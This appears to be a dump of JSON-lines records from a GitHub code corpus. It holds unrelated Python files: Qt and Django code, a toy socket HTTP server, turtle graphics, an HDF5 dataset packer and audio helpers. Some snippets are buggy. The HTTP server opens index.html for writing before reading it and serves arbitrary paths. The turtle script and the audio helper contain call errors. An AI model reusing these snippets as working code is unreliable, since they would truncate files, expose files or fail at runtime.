    \")\n ]\n\n self.menus = [[\":/data/images/menu-kicker.png\", texts[0]],\n [\":/data/images/menu-kickoff.png\", texts[1]],\n [\":/data/images/menu-kimpanel.png\", texts[2]]]\n\n vlayout = QVBoxLayout(self)\n\n labelLayout = QHBoxLayout()\n\n iconLabel = QLabel()\n iconLabel.setMaximumSize(64, 64)\n iconLabel.setPixmap(QIcon.fromTheme(\"kde\").pixmap(64, 64))\n labelLayout.addWidget(iconLabel)\n\n label = QLabel(self)\n label.setText(self.tr(\"

    You can also customize your KDE menu as you like. \\\n Please choose one from the following styles.

    \"))\n labelLayout.addWidget(label)\n vlayout.addLayout(labelLayout)\n\n vlayout.addItem(QSpacerItem(20, 40, QSizePolicy.Preferred, QSizePolicy.Preferred))\n\n self.comboBox = QComboBox(self)\n self.comboBox.addItem(self.tr(\"Application Menu\"))\n self.comboBox.addItem(self.tr(\"Application Launcher\"))\n self.comboBox.addItem(self.tr(\"Application Dashboard\"))\n vlayout.addWidget(self.comboBox)\n\n vlayout.addItem(QSpacerItem(20, 40, QSizePolicy.Preferred, QSizePolicy.Preferred))\n\n hlayout = QHBoxLayout(self)\n\n self.labelMenu = QLabel(self)\n self.labelMenu.setPixmap(QPixmap(self.menus[0][0]))\n self.labelMenu.setMaximumSize(350 ,214)\n hlayout.addWidget(self.labelMenu)\n self.labelText = QLabel(self)\n self.labelText.setWordWrap(True)\n self.labelText.setText(self.tr(self.menus[0][1]))\n hlayout.addWidget(self.labelText)\n\n vlayout.addLayout(hlayout)\n\n vlayout.addItem(QSpacerItem(20, 40, QSizePolicy.Preferred, QSizePolicy.Preferred))\n\n self.comboBox.currentIndexChanged.connect(self.menuSelect)\n\n self.menuSelected = 0\n\n\n def menuSelect(self, index):\n self.menuSelected = index\n self.labelMenu.setPixmap(QPixmap(self.menus[index][0]))\n self.labelText.setText(self.menus[index][1])\n\n def execute(self):\n menus = [\"org.kde.plasma.kicker\", \"org.kde.plasma.kickoff\", \"org.kde.plasma.kickerdash\"]\n menu = menus[self.menuSelected]\n\n configFilePath = join(QDir.homePath(), \".config\", \"plasma-org.kde.plasma.desktop-appletsrc\")\n parser = Parser(configFilePath)\n\n parser.setMenuStyleOrCreate(menu)\n","repo_name":"KaOSx/kaptan","sub_path":"kaptan5/libkaptan/ui_menu.py","file_name":"ui_menu.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"6130710972","text":"from decimal import Decimal\n\nfrom django.db.models import DecimalField, Q, QuerySet, Sum\nfrom django.db.models.functions import Coalesce\n\nfrom ...constants import TransactionTypes\n\n\nclass TransactionQuerySet(QuerySet):\n def aggregate_totals(self) -> dict[str, Decimal]:\n return self.aggregate(\n total_income=Coalesce(\n Sum(\n \"amount\",\n filter=Q(transaction_type=TransactionTypes.INCOME),\n ),\n 0,\n output_field=DecimalField(),\n ),\n total_expenses=Coalesce(\n Sum(\n \"amount\",\n filter=Q(transaction_type=TransactionTypes.EXPENSE),\n ),\n 0,\n output_field=DecimalField(),\n ),\n )\n\n def get_balance(self) -> dict[str, Decimal]:\n response_dict = {}\n totals_dict = self.aggregate_totals()\n response_dict[\"balance\"] = (\n totals_dict[\"total_income\"] - totals_dict[\"total_expenses\"]\n )\n return response_dict\n","repo_name":"sharvadim07/pockets","sub_path":"server/apps/pockets/models/querysets/transaction.py","file_name":"transaction.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73924917671","text":"# coding: utf-8\n\nimport socket\nimport os.path\n\nSERVER_HOST = '127.0.0.1'\nSERVER_PORT = 8000\n\ndef create_socket():\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n server.bind((SERVER_HOST, SERVER_PORT))\n server.listen(1)\n\n return server \n\ndef get_file_name(request):\n headers = request.split('\\n')\n filename = headers[0].split()[1]\n\n return filename\n\ndef send_response(client_connect, file_name):\n if file_name == \"/\":\n if os.path.isfile(\"index.html\"):\n with open(\"index.html\", \"w\") as file:\n content = file.read()\n response = \"HTTP/1.0 200 OK\\n\\n\" + content \n else: \n response = 'HTTP/1.0 200 OK\\n\\n\\n\\n\\tHello World'\n else:\n try:\n file_name = file_name[1:]\n with open(file_name, \"r\") as file:\n content = file.read()\n response = \"HTTP/1.0 200 OK\\n\\n\" + content\n except FileNotFoundError:\n response = \"HTTP/1.0 404 NOT FOUND\\n\\n OUPS File Not Found\"\n \n client_connect.sendall(response.encode())\n\ndef handle_connect(server):\n while True:\n client_connect, client_addr = server.accept()\n request = client_connect.recv(1024).decode()\n\n print(\"[server] client {} send a request\".format(client_addr))\n\n file_name = get_file_name(request)\n print(\"GET {}\".format(file_name))\n send_response(client_connect, file_name)\n\n client_connect.close()\n\nif __name__ == \"__main__\":\n server = create_socket()\n handle_connect(server)","repo_name":"Aziz-Fall/server","sub_path":"serveurhttp.py","file_name":"serveurhttp.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18999423488","text":"# Created by: Aiden Ridgeway\n# Created on 5/25/19\n\n\nimport random\nfrom time import sleep\nimport os\n\nplay = 1\n\noutput = []\ncount = 0\nscore = 0\n\ndef cls(): print(\"\\n\" * 50) # moves current text off of the screen\n\n\nwhile play == 1:\n a = (random.randint(1, 4))\n output.append(a)\n print(\"Ready...\")\n sleep(.5)\n cls()\n for val in output: # shows each value in the list once, on its own screen\n print(val)\n sleep(1)\n cls()\n sleep(.5)\n\n print(\"Enter all of the previous values\")\n for val in output: # reads each value individually and compares it to expected value to see if the user is correct\n i = 0\n i = input()\n i = int(i)\n if i != val:\n play = 0\n\n score = str(len(output))\nprint(\"Your Score was: \" + score)\n","repo_name":"akr00/Personal-RaspPi-Project","sub_path":".idea/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33552167468","text":"#!/usr/bin/env python\n# -*-coding:utf-8 -*-\n\n\"\"\"\n类的单例模式\n\"\"\"\n\n\ndef singleton(cls):\n __instances__ = {}\n\n def get_instance(*sub, **kw):\n key = (cls, tuple(sub), tuple(sorted(kw.items())))\n if key not in __instances__:\n __instances__[key] = cls(*sub, **kw)\n return __instances__[key]\n\n return get_instance\n\n\nif __name__ == '__main__':\n\n @singleton\n class Foo(object):\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n\n f1 = Foo('Linda', 18)\n f2 = Foo('Linda', 18)\n f3 = Foo('Jonathan', 28)\n\n print(id(f1)) # 2084750555512, f1==f2\n print(id(f2)) # 2084750555512, f1==f2\n print(id(f3)) # 2084750555064, f3单独实例\n","repo_name":"ni-ning/LearnPython","sub_path":"22Util/single.py","file_name":"single.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"75224979","text":"import pytest\nimport typing\n\nfrom smb.common.testing_utils import dt\n\nfrom crm.agency_cabinet.ord.common import structs, consts\nfrom crm.agency_cabinet.ord.server.src import procedures\nfrom crm.agency_cabinet.ord.server.src.db import models\n\n\n@pytest.fixture\ndef procedure():\n return procedures.CreateReport()\n\n\nasync def test_create_report(procedure, fixture_report_settings: typing.List[models.ReportSettings]):\n created = await procedure(structs.CreateReportRequest(\n agency_id=1,\n period_from=dt('2222-3-1 00:00:00'),\n reporter_type=consts.ReporterType.partner,\n ))\n\n report = await models.Report.query.where(models.Report.period_from == dt('2222-3-1 00:00:00')).gino.first()\n assert created == structs.ReportInfo(\n report_id=report.id,\n period_from=report.period_from,\n status=consts.ReportStatuses.draft,\n reporter_type=consts.ReporterType.partner,\n clients_count=0,\n campaigns_count=0,\n sending_date=None,\n settings=structs.ReportSettings(\n name='other',\n display_name='Другое',\n allow_create_ad_distributor_acts=True,\n allow_create_clients=True,\n allow_create_campaigns=True,\n allow_edit_report=True,\n )\n )\n\n await report.delete()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"crm/tests/procedures/reports/test_create_report.py","file_name":"test_create_report.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6783154418","text":"# from turtle import*\n# import colorsys\n# bgcolor('black')\n# tracer(10)\n# pensize(5)\n# h=0\n# for i in range(300):\n# c= colorsys.hsv_to_rgb(h,1,1)\n# h += 3.140\n# pencolor(c)\n# fillcolor('black')\n# begin_fill()\n# for j in range(2):\n# fd(i*1.2)\n# rt(100)\n# fd(350)\n# rt(123)\n# rt(121)\n# end_fill()\n# done()\n\nfrom turtle import *\nfrom time import sleep\n\nbgcolor(\"black\")\nt = [Turtle(), Turtle()]\nx = 6\ncolors = [\"red\", \"yellow\", \"blue\", \"lime\"]\nfor index, i in enumerate(t):\n i.speed(0)\n i.color(\"white\")\n i.shapesize(0.3)\n i.width(3)\n i.pu()\n i.seth(90)\n i.fd(350)\n i.seth(-180)\n i.pd()\nt[0].pu()\n\ndelay(0)\nspeed(0)\nht()\nsleep(4)\nfor i in colors:\n color(i)\n for i in range(360):\n t[0].fd[x]\n t[0].lt(1)\n pu()\n goto(t[0].pos())\n pd()\n t[1].fd[2 * x]\n t[1].lt(2)\n goto(t[1].pos())\ndone()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Baizak04/def","sub_path":"Python/python/Python/tutorial.py","file_name":"tutorial.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38744550728","text":"from odoo import http\nfrom odoo.http import request\nfrom odoo import fields, http, SUPERUSER_ID, _\nfrom odoo.addons.portal.controllers.portal import pager as portal_pager, get_records_pager\nfrom odoo.addons.portal.controllers import portal\n\n\nclass TimeOffcontroller(portal.CustomerPortal):\n def _prepare_home_portal_values(self, counters):\n values = super()._prepare_home_portal_values(counters)\n partner = request.env.user.partner_id\n\n HrLeave = request.env['hr.leave']\n if 'leave_count' in counters:\n values['leave_count'] = HrLeave.search_count([\n ('message_partner_ids', 'child_of', [partner.commercial_partner_id.id]),\n ('state', 'in', ['draft', 'confirm','refused','validate1','validate'])\n ]) if HrLeave.check_access_rights('read', raise_exception=False) else 0\n return values\n \n @http.route(['/my/timeoff', '/my/timeoff/page/'], type='http', auth=\"user\", website=True)\n def portal_my_timeoff(self, page=1, date_begin=None, date_end=None, sortby=None, **kw):\n values = self._prepare_portal_layout_values()\n partner = request.env.user.partner_id\n HrLeave = request.env['hr.leave']\n \n domain = [\n ('message_partner_ids', 'child_of', [partner.commercial_partner_id.id]),\n ('state', 'in', ['draft', 'confirm','refused','validate1','validate'])\n ]\n leave_count = HrLeave.search_count(domain)\n pager = portal_pager(\n url=\"/my/timeoff\",\n total=leave_count,\n page=page,\n )\n res = request.env['hr.leave'].search([('employee_ids','=',request.env.user.name)])\n values.update({\n \n 'res': res.sudo(),\n 'pager': pager,\n 'default_url': '/my/timeoff',\n })\n return request.render('timeoff_custom.portal_my_timeoff_details', values,{'res':res})\n \n\n","repo_name":"miva-odoo/odoo-task","sub_path":"timeoff_custom_2/controllers/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32866577926","text":"import re\nimport lmdb\nimport glob\nimport os\nfrom PIL import Image\nimport sqlite3\nimport time\nimport h5py\nimport numpy as np\n\n## Check SLURM is running\nif os.environ.get(\"SLURM_TMPDIR\") == None:\n raise ValueError(\"STLUM_TMPDIR not defined\")\ndata_dir = os.environ.get(\"SLURM_TMPDIR\") + \"/mnt/ramdisk/max/90kDICT32px/\"\n\n## Upack files to SLURM_TMPDIR\nprint(\"untar files to $SLURM_TMPDIR\")\nos.system(\"tar -C $SLURM_TMPDIR -xf mjsynth.tar.gz\")\nprint(\"untar done\")\n\n## List files inside the first level directory\nlevel_0 = glob.glob(os.path.join(data_dir + \"/*\"))\n\nif len(level_0) == 0:\n raise ValueError(\"No files in directoy\" + data_dir)\n\n################################# HDF5 file\nf = h5py.File('TextImages.hdf5')\ndt = h5py.special_dtype(vlen=np.dtype('uint8'))\ndset = f.create_dataset('images', (10000000, ), dtype=dt)\n\n\n################################# SQL file with meta info\n### sqlite file\nsql_conn = sqlite3.connect(\"TextImages-hdf5.sqlite\")\ncur = sql_conn.cursor()\nsql_table = 'CREATE TABLE IF NOT EXISTS meta (key integer PRIMARY KEY, label text NOT NULL, path text);'\ncur.execute(sql_table)\n\n#################################\nfiles_counter = 0\n\ntic = time.time()\n\nfor L0 in level_0:\n # skip files (not directories)\n if os.path.isfile(L0):\n print(\"Not a directory on the first level: \" + L0)\n continue\n \n level_1 = glob.glob(os.path.join(L0 + \"/*\"))\n\n for L1 in level_1:\n level_2 = glob.glob(os.path.join(L1 + \"/*\"))\n num_of_files = len(level_2)\n #num_of_files = 2\n for i in range(num_of_files): \n L2 = level_2[i]\n files_counter = files_counter + 1\n\n if(files_counter % 1000 == 0): \n print(\"working with file number:\" + str(files_counter))\n \n remaining_path, file_name = os.path.split(L2)\n remaining_path, dir1 = os.path.split(remaining_path)\n remaining_path, dir2 = os.path.split(remaining_path)\n original_path = dir2 + \"/\" + dir1 + \"/\" + file_name\n key = files_counter - 1 \n\n label = \"\".join(re.findall(\"_[a-zA-Z]+_\", file_name)).strip(\"_\")\n try:\n with open(L2, mode='rb') as file:\n value = file.read()\n \n dset[files_counter - 1] = np.fromstring(value, dtype='uint8')\n \n sql_insert = 'INSERT INTO meta(key,label,path) VALUES(' + \\\n str(key) +',\"' + label + '\",\"' + original_path + '\");'\n \n cur.execute(sql_insert)\n\n except Exception as e:\n print(\"Error observed: \" + str(e))\n with open(\"errors_hdf5.txt\", \"a+\") as file:\n file.write(\"Error:\" + str(e) + \" . Observed for file \" + L2 + \"\\n\" )\n \nsql_conn.commit()\nsql_conn.close()\nf.close() \nprint(\"Process took: \" + str(time.time() - tic))\nprint(\"DONE!\")\n\n","repo_name":"nyuhpc/public_ml","sub_path":"Data_read_benchmarking/TextImages/write_jpg_hdf5_all.py","file_name":"write_jpg_hdf5_all.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"40116824548","text":"\"\"\"\n.. module:: helper\n :platform: Platform Independent\n :synopsis: This module has commonly used helper functions used by client\n\"\"\"\n\n\nimport os\nimport sys\nimport glob\nimport platform\nimport wave\nimport random\nimport string\nimport datetime\nimport time\nimport json\nimport collections\nfrom array import array\n\n\ndef eprint(*args, **kwargs):\n print(*args, file=sys.stderr, **kwargs)\n\n\ndef _creation_date(path_to_file):\n \"\"\"\n Internal function for getting creation date\n Try to get the date that a file was created, falling back to when it was\n last modified if that isn't possible.\n See http://stackoverflow.com/a/39501288/1709587 for explanation.\n\n :param path_to_file: Get unique file name by getting creation date\n :type path_to_file: string\n :return: get creation date\n :rtype: stat.st_mtime\n\n \"\"\"\n if platform.system() == \"Windows\":\n return os.path.getctime(path_to_file)\n else:\n stat = os.stat(path_to_file)\n try:\n return stat.st_birthtime\n except AttributeError:\n # We're probably on Linux. No easy way to get creation dates here,\n # so we'll settle for when its content was last modified.\n return stat.st_mtime\n\n\ndef get_current_time():\n \"\"\"Return Current Time in MS.\"\"\"\n\n return int(round(time.time() * 1000))\n\n\ndef get_current_time_now():\n \"\"\"Return Current Time in MS.\"\"\"\n\n return datetime.datetime.now()\n\n\ndef generate_filename():\n rand_str = \"\".join(random.choices(string.ascii_uppercase + string.digits, k=8))\n now = datetime.datetime.now().strftime(\"%d-%m-%Y-%H-%M-%S\")\n\n return now + rand_str\n\n\ndef write_audio_wave(audio_data, filename, RATE, SAMPLE_WIDTH, CHANNELS=1):\n if len(audio_data) > 100:\n print(\"writing wav audio\")\n wf = wave.open(filename, \"wb\")\n wf.setnchannels(CHANNELS)\n wf.setsampwidth(SAMPLE_WIDTH)\n wf.setframerate(RATE)\n wf.writeframes(b\"\".join(audio_data))\n wf.close()\n else:\n print(\"audio Data is empty, skip save\", flush=True)\n\n\n\ndef write_audio(audio_data, filename, RATE, SAMPLE_WIDTH, CHANNELS=1):\n f = open(filename, \"w+b\")\n # binary_format = bytes(audio_data)\n # binary_format = bytearray(audio_data)\n binary_format = b\"\".join(audio_data)\n f.write(binary_format)\n f.close()\n\n\ndef write_audio_flac(audio_data, filename):\n\n # arr = numpy.array(audio_data, dtype=numpy.float32)\n # print(\"arr.dtype\", arr.dtype)\n # bytearray(audio_data)\n\n mat = np.array(audio_data)\n print(\"\\n\\n***mat.dtype\", mat)\n\n if len(audio_data) > 100:\n binary_format = b\"\".join(audio_data)\n f = open(filename, \"w+b\")\n f.write(binary_format)\n f.close()\n else:\n print(\"audio Data is empty, skip save\", flush=True)\n\n # sf.write(filename, arr, RATE)\n","repo_name":"keplerlab/enhant","sub_path":"api/transcription_svc/websocket-server/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"72"} +{"seq_id":"71643871594","text":"def age():\n try:\n age = int(input('Age: '))\n year = int(input('Year: '))\n salary = int(100000)\n risk = salary / age / year\n print(risk)\n except ZeroDivisionError:\n print(\"Can't divide by this number\")\n except ValueError:\n print(\"Not a numerical value\")\nage()\n\n","repo_name":"KennyIT3/Python_Scipts-Automating-Sysadmin","sub_path":"Scripts/salary.py","file_name":"salary.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32581351759","text":"from functools import wraps\n\nfrom django.http.response import HttpResponse\nfrom rest_framework import status\nfrom rest_framework.response import Response\n\n\ndef with_serializer(serializerClass, success_code=status.HTTP_201_CREATED,\n dataGetter=lambda request: request.data,\n **kwargs):\n def dec(func):\n @wraps(func)\n def c(*a, **k):\n\n if len(a) == 2:\n self, request = a[:2]\n elif len(a) == 1:\n self, request = None, a[0]\n else:\n raise AssertionError(\"Incorrect argument count\")\n\n serializer = serializerClass(data=dataGetter(request), context={\n \"request\": request,\n \"view\": self\n }, **kwargs)\n\n if serializer.is_valid():\n a += (serializer, )\n out = func(*a, **k)\n\n if not isinstance(out, HttpResponse):\n return Response(out, status=success_code)\n return out\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n return c\n return dec\n","repo_name":"andruwwwka/rebus-hackathon-final","sub_path":"core/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"35785244071","text":"# import sys\n# sys.stdin = open('input.txt')\n# from pprint import pprint\n# T = int(input())\n# for tc in range(1,T+1):\n# N = int(input())\n\n# board = [[0 for _ in range(10)] for _ in range(10)]\n# pprint(board)\n# for i in range(N):\n# color_data = list(map(int, input().split())) \n# left_top_x = color_data[0]\n# left_top_y = color_data[1]\n# rigt_bottom_x = color_data[2]\n# right_bottom_y = color_data[3]\n\n# color = color_data[4]\n\n# for x in range(left_top_x,rigt_bottom_x+1):\n# for y in range(left_top_y,right_bottom_y+1):\n# board[x][y] += color\n# count = 0\n# for x in range(10):\n# for y in range(10):\n# if board[x][y] == 3:\n# count += 1\n\n\n# 부분집합\nnumbers = [2,5,1,4]\n\nn = len(numbers)\n\n# 1을 두번씩 곱해간다 => 2^4\nfor i in range(1<= 90:\r\n return \"A\"\r\n elif score >=80:\r\n return \"B\"\r\n elif score >=70:\r\n return \"C\"\r\n elif score >=60:\r\n return \"D\"\r\n else:\r\n return \"F\"\r\n\r\ndef get_class_average(students):\r\n results = []\r\n for i in students:\r\n results.append(get_average(i))\r\n return average(results)\r\n\r\n\r\nprint(get_class_average((students)))\r\nprint(get_letter_grade(get_class_average(students)))","repo_name":"ariiel1/Assignment-Week-6","sub_path":"Assignment 4/Assignment-4.py","file_name":"Assignment-4.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5420254978","text":"from pygame import *\nfrom random import randint\n\nsize = width, height = 800, 600\nscreen = display.set_mode(size)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\n\nrectList = [Rect(randint(0, width-40), randint(0, height-40), 40, 40) for i in range(10)]\n\nrunning = True\nwhile running:\n for evt in event.get():\n if evt.type == QUIT:\n running = False\n mp = mouse.get_pos()\n mb = mouse.get_pressed()\n for rect in rectList:\n color = GREEN\n if rect.collidepoint(mp):\n if mb[0]:\n color = RED\n else:\n color = BLUE\n draw.rect(screen, color, rect)\n display.flip()\n\nraise SystemExit\n","repo_name":"BlazingAsher/ICS3U-Coursework","sub_path":"randomrectptest4.py","file_name":"randomrectptest4.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41032067544","text":"\"\"\"Rewrite a simplified BERT version based on the huggingface BERT but allow for scripting to all kinds of variations.\"\"\"\nfrom typing import Optional\n\nimport torch\n\nfrom .components import (\n AttentionComponent,\n EmbeddingComponent,\n FFNComponent,\n PoolingComponent,\n PredictionHeadComponent,\n _get_nonlin_fn,\n _get_norm_fn,\n)\n\n# import torchdynamo # need to disable dynamo in dynamic parts\n\n\ndef construct_fixed_cramlm(cfg_arch, vocab_size, downstream_classes=None):\n \"\"\"See the config file for details on what is possible.\"\"\"\n cfg_arch.embedding.vocab_size = vocab_size\n cfg_arch.num_labels = downstream_classes\n if downstream_classes is None:\n model = ScriptableLMForPreTraining(ScriptableLM(cfg_arch), cfg_arch)\n else:\n model = ScriptableLMForSequenceClassification(ScriptableLM(cfg_arch), cfg_arch)\n return model\n\n\nclass TransformerLayer(torch.nn.Module):\n \"\"\"A transformer-encoder structure based on the components from above.\"\"\"\n\n def __init__(self, idx, cfg_arch):\n super().__init__()\n self.dropout = torch.nn.Dropout(cfg_arch.hidden_dropout_prob, inplace=False)\n self.norm1 = _get_norm_fn(cfg_arch.norm)(cfg_arch.hidden_size, eps=cfg_arch.norm_eps)\n self.norm2 = _get_norm_fn(cfg_arch.norm)(cfg_arch.hidden_size, eps=cfg_arch.norm_eps)\n self.attn = AttentionComponent(\n idx,\n cfg_arch.hidden_size,\n cfg_arch.attention,\n cfg_arch.use_bias,\n )\n self.ffn = FFNComponent(\n cfg_arch.hidden_size,\n cfg_arch.intermed_size,\n _get_nonlin_fn(cfg_arch.nonlin),\n cfg_arch.use_bias,\n )\n\n def forward(self, states, attention_mask: Optional[torch.Tensor] = None):\n states = states + self.dropout(self.attn(self.norm1(states), attention_mask))\n states = states + self.dropout(self.ffn(self.norm2(states)))\n return states\n\n\nclass ScriptableLM(torch.nn.Module):\n \"\"\"Definitely can represent BERT, but also a lot of other things. To be used for MLM schemes.\"\"\"\n\n def __init__(self, cfg_arch):\n super().__init__()\n self.cfg = cfg_arch\n\n self.embedding = EmbeddingComponent(cfg_arch.embedding, cfg_arch.norm, cfg_arch.norm_eps)\n self.layers = torch.nn.ModuleList([TransformerLayer(idx, cfg_arch) for idx in range(cfg_arch.num_transformer_layers)])\n\n if self.cfg.final_norm:\n self.final_norm = _get_norm_fn(cfg_arch.norm)(cfg_arch.hidden_size, eps=cfg_arch.norm_eps)\n else:\n self.final_norm = torch.nn.Identity()\n\n def forward(self, input_ids, attention_mask: Optional[torch.Tensor] = None, labels: Optional[torch.Tensor] = None):\n hidden_states = self.embedding(input_ids)\n hidden_states = hidden_states.transpose(0, 1).contiguous()\n\n for i, layer_module in enumerate(self.layers):\n hidden_states = layer_module(hidden_states, attention_mask)\n\n hidden_states = hidden_states.transpose(0, 1).contiguous()\n\n return self.final_norm(hidden_states)\n\n\nclass ScriptableLMForPreTraining(torch.nn.Module):\n \"\"\"Definitely can represent BERT, but also a lot of other things. To be used for MLM schemes.\"\"\"\n\n def __init__(self, encoder, cfg_arch):\n super().__init__()\n self.cfg = cfg_arch\n\n self.encoder = encoder\n self.prediction_head = PredictionHeadComponent(cfg_arch)\n\n self.decoder = torch.nn.Linear(cfg_arch.embedding.embedding_dim, cfg_arch.embedding.vocab_size, bias=cfg_arch.decoder_bias)\n self.decoder.weight = self.encoder.embedding.word_embedding.weight\n\n self.loss_fn = torch.nn.CrossEntropyLoss()\n self.sparse_prediction = self.cfg.sparse_prediction\n self.vocab_size = cfg_arch.embedding.vocab_size\n\n for name, module in self.named_modules():\n _init_module(\n name,\n module,\n self.cfg.init.type,\n self.cfg.init.std,\n self.cfg.hidden_size,\n self.cfg.num_transformer_layers,\n )\n\n def forward(self, input_ids, attention_mask: Optional[torch.Tensor] = None, labels: Optional[torch.Tensor] = None):\n outputs = self.encoder(input_ids, attention_mask)\n outputs = outputs.view(-1, outputs.shape[-1])\n\n if self.sparse_prediction:\n masked_lm_loss = self._forward_dynamic(outputs, labels)\n else:\n outputs = self.decoder(self.prediction_head(outputs))\n if labels is not None:\n masked_lm_loss = self.loss_fn(outputs, labels.view(-1))\n else:\n masked_lm_loss = outputs.new_zeros((1,))\n\n return {\"loss\": masked_lm_loss}\n\n # Sparse prediction can have an unpredictable number of entries in each batch\n # depending on how MLM is running\n # for this reason, the code has to fall back to eager mode there\n # @torchdynamo.disable\n def _forward_dynamic(self, outputs: torch.Tensor, labels: Optional[torch.Tensor] = None):\n if labels is not None:\n labels = labels.view(-1)\n mask_positions = labels.view(-1) != self.loss_fn.ignore_index\n outputs = outputs[mask_positions]\n labels = labels[mask_positions]\n\n outputs = self.decoder(self.prediction_head(outputs))\n if labels is not None:\n masked_lm_loss = self.loss_fn(outputs, labels)\n else:\n masked_lm_loss = outputs.new_zeros((1,))\n return masked_lm_loss\n\n\nclass ScriptableLMForSequenceClassification(torch.nn.Module):\n \"\"\"Classification head and pooler.\"\"\"\n\n def __init__(self, encoder, cfg_arch):\n super().__init__()\n self.cfg = cfg_arch\n\n self.encoder = encoder\n self.pooler = PoolingComponent(cfg_arch.classification_head, cfg_arch.hidden_size)\n self.head = torch.nn.Linear(cfg_arch.classification_head.head_dim, cfg_arch.num_labels)\n\n self.problem_type = None\n self.num_labels = self.cfg.num_labels\n\n for name, module in self.named_modules():\n _init_module(\n name,\n module,\n self.cfg.init.type,\n self.cfg.init.std,\n self.cfg.hidden_size,\n self.cfg.num_transformer_layers,\n )\n\n def forward(self, input_ids, attention_mask: Optional[torch.Tensor] = None, labels: Optional[torch.Tensor] = None):\n logits = self.head(self.pooler(self.encoder(input_ids, attention_mask)))\n\n if labels is not None:\n if self.problem_type is None: # very much from huggingface\n if self.cfg.num_labels == 1:\n self.problem_type = \"regression\"\n elif self.cfg.num_labels > 1 and (labels.dtype == torch.long or labels.dtype == torch.int):\n self.problem_type = \"single_label_classification\"\n else:\n self.problem_type = \"multi_label_classification\"\n\n if self.problem_type == \"regression\":\n loss_fct = torch.nn.MSELoss()\n if self.num_labels == 1:\n loss = loss_fct(logits.squeeze(), labels.squeeze())\n else:\n loss = loss_fct(logits, labels)\n elif self.problem_type == \"single_label_classification\":\n loss_fct = torch.nn.CrossEntropyLoss()\n loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))\n elif self.problem_type == \"multi_label_classification\":\n loss_fct = torch.nn.BCEWithLogitsLoss()\n loss = loss_fct(logits, labels)\n else:\n loss = logits.new_zeros((1,))\n\n return dict(logits=logits, loss=loss)\n\n\ndef _init_module(name, module, init_method, init_std=0.02, hidden_size=768, num_layers=12):\n std = init_std\n if isinstance(module, torch.nn.Linear):\n # Slightly different from the TF version which uses truncated_normal for initialization\n # cf https://github.com/pytorch/pytorch/pull/5617\n module.weight.data.normal_(mean=0.0, std=std)\n if module.bias is not None:\n module.bias.data.zero_()\n elif isinstance(module, torch.nn.Embedding):\n module.weight.data.normal_(mean=0.0, std=std)\n if module.padding_idx is not None:\n module.weight.data[module.padding_idx].zero_()\n elif isinstance(module, torch.nn.LayerNorm):\n module.bias.data.zero_()\n module.weight.data.fill_(1.0)\n","repo_name":"JeanKaddour/NoTrainNoGain","sub_path":"bert/cramming/architectures/fixed_cramlm.py","file_name":"fixed_cramlm.py","file_ext":"py","file_size_in_byte":8534,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"72"} +{"seq_id":"24156610784","text":"from django.http import HttpResponse\nfrom django.utils import timezone\nfrom drf_excel.renderers import XLSXRenderer\n\nfrom rest_framework import (\n serializers,\n status,\n)\nfrom rest_framework.decorators import renderer_classes\nfrom rest_framework.generics import get_object_or_404\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import ViewSet\n\nfrom drf_spectacular.utils import extend_schema\n\nfrom base.api.serializers import inline_serializer\nfrom core.api.common.mixins import FilterAPIMixin\nfrom core.api.common.openapi_serializers import (\n NotFoundResponse,\n UnauthorizedResponse,\n)\nfrom core.api.controllers import catch_use_case_errors_as_view\nfrom core.api.entities.filters.entities import EntitiesFilter\nfrom core.domain.entities.usecases.create_entity import CreateEntityUseCase\nfrom core.domain.entities.usecases.delete_entity import DeleteEntityUseCase\nfrom core.infra.attributes.models import AttributeValue\nfrom core.infra.attributes.repositories.attribute import 